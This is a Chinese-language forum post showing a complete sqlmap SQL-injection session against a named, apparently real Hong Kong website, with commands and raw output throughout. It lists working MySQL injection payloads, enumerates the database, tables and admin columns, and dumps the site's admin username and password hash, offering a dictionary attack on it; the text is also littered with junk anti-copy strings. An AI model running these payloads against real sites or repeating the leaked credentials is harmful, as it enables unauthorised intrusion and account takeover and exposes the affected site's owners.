找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2423|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db# v" @- }% p7 u3 F/ Y5 S
ms "Mysql" --current-user       /*  注解:获取当前用户名称2 ]/ a2 W* _9 v5 {
    sqlmap/0.9 - automatic SQL injection and database takeover tool
4 M5 {* E; P7 b( p% s" C3 ]    http://sqlmap.sourceforge.net
  • starting at: 16:53:54
    * c8 W$ T* d5 V9 ]+ R) ?[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as6 N8 M+ m0 @0 Q4 v* y% I! X
    session file
    ' o: K; @5 D& Y* t0 S[16:53:54] [INFO] resuming injection data from session file, {( u+ e9 c! \* R7 e- }- }
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    3 G1 o; `# T! U9 s: E[16:53:54] [INFO] testing connection to the target url
    ; V# M4 a" y$ U/ S3 m! V$ u5 msqlmap identified the following injection points with a total of 0 HTTP(s) reque
    8 w" F. |, [/ r* M- j2 ests:" S5 A& r/ _. a) e8 ?8 N, ^
    ---; L  C' Q. m! {* G
    Place: GET
    ( O7 C6 _! ~; q# }1 dParameter: id& ?$ c* n8 o) ?2 E: a9 f
        Type: boolean-based blind
    0 Q: `2 s  [% R% Y1 N. s    Title: AND boolean-based blind - WHERE or HAVING clause
    % }3 J1 K9 |+ N6 h% ^" F7 O7 d    Payload: id=276 AND 799=799$ A4 p8 z9 |' B
        Type: error-based
    ' \  \# f  }8 l/ _    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause5 C4 C2 I* C/ l' ^9 v; h% |% N
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    ) L" f' v/ A3 t- y" F2 r& J4 k120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,581 k+ Y! ~: f# F# D3 A9 H9 |
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)5 C% |; T3 a8 B4 A, v
        Type: UNION query9 r% t1 ]: n- _3 ^" Y# u
        Title: MySQL UNION query (NULL) - 1 to 10 columns1 a: j/ M% n: v1 r) m5 m- t
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR# N$ Z3 M& O0 `% H
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),2 F4 B% }2 I' ^" M9 B% E
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#) V! J' f0 m- T  ]- g
        Type: AND/OR time-based blind  m7 v; l4 l& g- B8 q
        Title: MySQL > 5.0.11 AND time-based blind' w4 G+ x% }% o- z- O# @
        Payload: id=276 AND SLEEP(5)
    # q7 p/ J  [. N# d' f. ]---
    8 O5 s( h& T0 W6 x) [/ m[16:53:55] [INFO] the back-end DBMS is MySQL" f! a6 n2 k( Q
    web server operating system: Windows
    3 t3 e2 j& j" K1 R. u: [web application technology: Apache 2.2.11, PHP 5.3.0+ F' _% Y+ N  G
    back-end DBMS: MySQL 5.0' A! m* Y- Y7 x
    [16:53:55] [INFO] fetching current user
    3 `' |  U6 X2 J* c% Dcurrent user:    'root@localhost'   
    # _! V$ ?) J8 C# L; F4 }+ K[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    : W1 L3 b& X! k& ~tput\www.wepost.com.hk'
  • shutting down at: 16:53:58
    ) O; [+ Y7 B0 @9 |* \" @" I: e# T. ^7 ]% ^3 \
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db2 n& ~3 G9 }' b2 U& G/ c; k
    ms "Mysql" --current-db                  /*当前数据库
    / P1 N4 g, D& Z' g, r5 O# j    sqlmap/0.9 - automatic SQL injection and database takeover tool  H3 v& p7 m7 N9 M0 d
        http://sqlmap.sourceforge.net
  • starting at: 16:54:16% m, h4 L# e: L0 Q) ]
    [16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    $ f' @5 }. @# o) b- Q session file
    . ]" a( o* C5 C( A+ h[16:54:16] [INFO] resuming injection data from session file
    7 y2 r. S6 v4 L[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    9 P3 P5 m4 {/ M4 ~# `: l[16:54:16] [INFO] testing connection to the target url
    & `9 s" H7 M: J: A! N2 Lsqlmap identified the following injection points with a total of 0 HTTP(s) reque
    . n* I) M6 W: y7 X; p; ?# ]0 I3 h' Asts:
    - X" B1 u. b0 y- H* ~3 k" n' V' E& h---
    ' y4 c( q2 J, |) xPlace: GET
    ; _0 _3 K5 X, t$ t1 kParameter: id% l3 j8 X- G# S( \2 e% F3 H
        Type: boolean-based blind  r2 u6 F1 F1 r) H/ O& F. m( x9 |
        Title: AND boolean-based blind - WHERE or HAVING clause
    ) \/ ]3 U) c0 x; u    Payload: id=276 AND 799=799& ]% m0 C) E" M; j1 \
        Type: error-based9 u* p7 e7 D) |; `
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause. Z& n" L. }+ w% S+ R
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,  `8 k: e  k" c2 N3 h: X  R
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58" `5 a8 }* \( ?3 k
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    * L+ N# x7 M6 j9 S    Type: UNION query
    4 ]" q3 T5 q" a! Q4 X, u: B    Title: MySQL UNION query (NULL) - 1 to 10 columns
    ; z9 \" K( r* ]    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
      p5 l" j; B( p" _9 B0 o* t( \(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    0 [0 w! C9 H- T" f/ x7 ICHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    3 ?4 f7 Y4 T% M. E. E$ i( Z5 y: E    Type: AND/OR time-based blind% z, [" I$ |/ w3 u3 ^- p
        Title: MySQL > 5.0.11 AND time-based blind  }' k  I/ ^2 D# I% i, D
        Payload: id=276 AND SLEEP(5)3 q4 B8 D( I7 j* ~
    ---/ c# ?# ?+ _) J' r$ O$ V, E
    [16:54:17] [INFO] the back-end DBMS is MySQL
    # M6 W/ b9 G' ~- W" sweb server operating system: Windows
      m( t- X) Y" u* C& y' m* h4 ~web application technology: Apache 2.2.11, PHP 5.3.0
    $ u/ ~1 b0 O: N4 f( b" N7 q9 Eback-end DBMS: MySQL 5.0
    : Z& M: L0 Q7 d6 {7 r3 t7 Q[16:54:17] [INFO] fetching current database
    % U7 H1 h6 t' B( ]* t: Pcurrent database:    'wepost'
    ) n. T  ^  v7 X[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou/ U' h4 ~, S1 g
    tput\www.wepost.com.hk'
  • shutting down at: 16:54:18
    3 r5 b% b( k& C. _1 g0 M  @D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    : H  R" Y% T% f: Ems "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名
    1 I3 N% y5 a  M% }; m. m    sqlmap/0.9 - automatic SQL injection and database takeover tool
    8 t& E7 m. j7 {, v8 V5 C0 ]    http://sqlmap.sourceforge.net
  • starting at: 16:55:25! a  k2 k: r0 _1 v4 J
    [16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    - C9 P4 h* ~2 `- Y6 x session file
    % M- k( N  Z6 ?" w( {/ N) V[16:55:25] [INFO] resuming injection data from session file
      N5 a6 x1 T7 Z5 ^8 j  l5 F7 F6 O& F[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    7 x2 n9 h  {' k% F3 W6 G, r[16:55:25] [INFO] testing connection to the target url
    $ ^4 p2 c8 P0 j1 a( {; xsqlmap identified the following injection points with a total of 0 HTTP(s) reque
    7 @# d" o( ]) ?) a2 _+ t2 hsts:& V" F& m& u5 i* a3 h7 g9 b
    ---, v( E- S  x9 q: C! L
    Place: GET* y4 y' j! r; |% f/ V9 s% v7 p
    Parameter: id, d  |1 M( Q& |4 M9 K- ~
        Type: boolean-based blind5 r2 B8 R+ S' U& S; D; v% P$ F
        Title: AND boolean-based blind - WHERE or HAVING clause
    + g7 C4 A# X" I" [. ]1 v  q& D    Payload: id=276 AND 799=799( @7 O4 I/ `. x' h) j* Q
        Type: error-based
    + s6 \3 ^) W2 c  E0 h3 f    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause4 o  o: M9 A( c( M
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,1 A& \# X4 S. W
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    8 k+ c& c0 r- r$ g),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    ! ]. F9 w% Y7 [1 W' ~' \9 v+ j    Type: UNION query5 P0 u4 A8 v: a( g; U8 G( T1 O
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    # C, Q, K2 C" I; p    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    : Z2 |0 Y- Y! q+ U; ]+ `(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),8 f( B$ O: e0 `
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    6 X. I" w& @* U" r    Type: AND/OR time-based blind. |, H( A& T: A7 ?- g$ ~
        Title: MySQL > 5.0.11 AND time-based blind
    , M  ^! E9 p# \8 k- \, }8 f* Y    Payload: id=276 AND SLEEP(5)
    ' s4 p! ?" I: c7 W' C! ]---+ i* H9 E0 o: C+ B' x6 a2 O& u
    [16:55:26] [INFO] the back-end DBMS is MySQL: |# j3 Z$ S3 m- s
    web server operating system: Windows
    / c. I( m/ h/ V2 \3 V" Aweb application technology: Apache 2.2.11, PHP 5.3.02 Q' U0 E# X: k8 k: Y
    back-end DBMS: MySQL 5.0
    ; S, _" @' e, E! @( K7 }8 e4 E[16:55:26] [INFO] fetching tables for database 'wepost'0 m7 A8 ?% e2 l& F
    [16:55:27] [INFO] the SQL query used returns 6 entries
    " z! G8 R2 B0 k5 u$ hDatabase: wepost; D0 e+ Q) e0 r0 r
    [6 tables]
    * T; n. Q) ~  a/ D+-------------+
    8 J1 b  U4 z4 Q8 q1 o; G| admin       |
    ) p& _- ]0 j4 O  k7 Q9 T  x| article     |0 B) v, |* p  D
    | contributor |. w4 J/ y% @' x4 n
    | idea        |. v7 ]+ S2 @7 ^1 U0 ~% S
    | image       |' N  G: G, W1 k& F; a) W
    | issue       |
    ! e/ F- {: H9 ?+-------------+. Q2 {6 y$ Y" X! y
    [16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou5 V% N7 z( O% L& h9 L
    tput\www.wepost.com.hk'
  • shutting down at: 16:55:331 N- ?' C0 ~4 D

    & t$ F) K" S! |* C, E3 YD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db8 l. Q( R( w; t: X. e  H4 o
    ms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名
    ) l1 Y/ x! n6 A    sqlmap/0.9 - automatic SQL injection and database takeover tool
    7 ?4 }# l6 P  v$ j" J    http://sqlmap.sourceforge.net
  • starting at: 16:56:06
    . ]1 h8 k# o0 \sqlmap identified the following injection points with a total of 0 HTTP(s) reque& |! E7 D; P) G- s* s
    sts:
    5 ^) s, H4 ~+ N% B. M3 C0 `0 V) |---/ E- i5 G3 X9 C  h# ~- J6 _
    Place: GET
    - m8 i6 R/ G4 F' N% B7 e7 s/ \5 HParameter: id
    & B- i: G0 g$ B0 N2 d! P* r) R    Type: boolean-based blind
    ( {  Q( D- H. c    Title: AND boolean-based blind - WHERE or HAVING clause% i8 W* f7 p6 y6 G, a4 {* a
        Payload: id=276 AND 799=799) `$ ]! A1 I  @) b6 x
        Type: error-based
    ( n2 q4 P  u+ K& M0 q. E/ T) e    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    - j. i+ Q. i3 ?( a* ]0 s    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    0 @: m- @: R5 h/ f120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    ( |' S9 M  D- B9 Y),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)) M3 F1 R4 q* {. C1 C9 \1 o
        Type: UNION query
    % z" e( J8 o0 ?! I7 x    Title: MySQL UNION query (NULL) - 1 to 10 columns
    ; e: A# ~6 a% f3 B" h" S5 A3 R    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR+ P8 b0 n3 Y0 p
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    . J, k, q' i2 O% D+ y; CCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    & q0 j* E) |) R1 P    Type: AND/OR time-based blind% K& Y8 h* X5 O4 f
        Title: MySQL > 5.0.11 AND time-based blind5 |+ [5 J) b- C- c
        Payload: id=276 AND SLEEP(5)
    - A9 \6 S  Q7 N5 ^( {0 J3 R( V---( [5 B) v8 {+ p  F
    web server operating system: Windows, e) w) O, D' V  B* f  `
    web application technology: Apache 2.2.11, PHP 5.3.0
    6 X) s# i/ j( z+ a6 `- d' Zback-end DBMS: MySQL 5.0) F6 z# z; x+ Z6 W2 {& W
    [16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se0 W  l) V( a7 G  T8 d
    ssion': wepost, wepost) |6 q+ E6 H% E2 J# ~' ~
    Database: wepost
    % I/ n, F' d/ r% dTable: admin
    9 C; ?( G: e% v: ?9 @; Z[4 columns]
    4 a  d$ u- V: C* |% \+----------+-------------+2 P: k9 T2 i0 e- Z6 f9 _
    | Column   | Type        |$ p; W9 k' @% K' V3 z6 i2 |
    +----------+-------------+4 N4 u: t& `/ k! E
    | id       | int(11)     |  @4 N1 c' e+ g1 \6 M  q& j
    | password | varchar(32) |
    0 b7 @4 [8 r% f: R. G: |* x, P| type     | varchar(10) |
    3 R# H9 y; E+ \/ g1 P6 q1 S2 n3 W| userid   | varchar(20) |  Z: d# t/ ~) ~, q8 T# Q/ n1 r7 P
    +----------+-------------+
    % D1 K9 L. k1 e5 ?0 c& Q6 u
  • shutting down at: 16:56:19
    4 g1 ^  F/ n0 j, F( d4 U1 v
    + c& O, r% E" U. \) tD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    " _, |) |( N# V2 U1 w, }/ `# Cms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容. C% `# X4 D: [" x( n; H4 M/ P. m' j/ a( M
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    # a* {% f& Z6 K+ i. ~    http://sqlmap.sourceforge.net
  • starting at: 16:57:141 w, ?% u1 x; `% l
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    5 @# p/ L, t! [sts:
    6 _1 D, e7 h8 U---; ~  M$ e- S& j7 X! I
    Place: GET( `* [" k' X& z/ G7 V1 s! s8 G
    Parameter: id
    " i/ q) Z$ O; h8 V3 d    Type: boolean-based blind( n7 ~* W; `; S* I( y4 A
        Title: AND boolean-based blind - WHERE or HAVING clause
    0 ]( [' A4 m$ I5 i1 I    Payload: id=276 AND 799=799+ y; s* B- E  F, J$ k2 H: t
        Type: error-based1 q# l$ v5 \9 X* A7 B, Y. B" q
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    % l: z' j- d8 X! W* K    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,+ J0 |  o/ c8 u: r' G$ e
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    # D4 w6 ?. u& U; o& }) O: u  t),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)2 G- x% M* q5 s
        Type: UNION query4 \* }+ H8 [( m1 O  j4 R
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    0 S9 N/ _) |  J# P    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR2 J7 p4 I8 L  [  ]* Y; b4 L- [
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),/ X5 @: [# o# Y' U, Z' M8 O/ y' u
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    - y1 F2 J+ E8 q    Type: AND/OR time-based blind: y6 R, P3 u5 W2 r5 B+ C
        Title: MySQL > 5.0.11 AND time-based blind0 k* K1 e" ^/ ~% ]1 `: Y
        Payload: id=276 AND SLEEP(5): W$ f/ H# n3 `7 R0 t! q& A
    ---
    ; L9 i3 V" `% x" ^: w' r- Qweb server operating system: Windows" ^, @" z" n" K
    web application technology: Apache 2.2.11, PHP 5.3.0* y; M& V/ J6 h# U6 F
    back-end DBMS: MySQL 5.0
    0 i! A4 R! Y- D" r* U( }# Mrecognized possible password hash values. do you want to use dictionary attack o0 b% k# a2 a. y4 Q
    n retrieved table items? [Y/n/q] y
    ( ]7 ]+ G8 E- Z4 M" n* bwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
    6 @9 j. I0 y% M# }/ D* }1 bdo you want to use common password suffixes? (slow!) [y/N] y  P( H" W  j& P1 B( Z; R
    Database: wepost
    1 w0 g3 s" G) q  @7 w( xTable: admin
    % x4 |- i6 `% ~8 x  ^$ Y: [[1 entry]+ y+ ]1 D# l* o' w
    +----------------------------------+------------+/ b2 c1 H9 C' t1 c
    | password                         | userid     |$ G& W0 t! ~$ n/ V7 F
    +----------------------------------+------------+* Y  |& S. ?( T" \4 ~" F% }- s' v
    | 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |+ F+ Q. z: B  h; G
    +----------------------------------+------------+' e, O- c) \9 M3 ~9 L( ]7 y
  • shutting down at: 16:58:14" n1 W* W/ D: t8 B
    6 f# Q' g( l6 t
    D:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表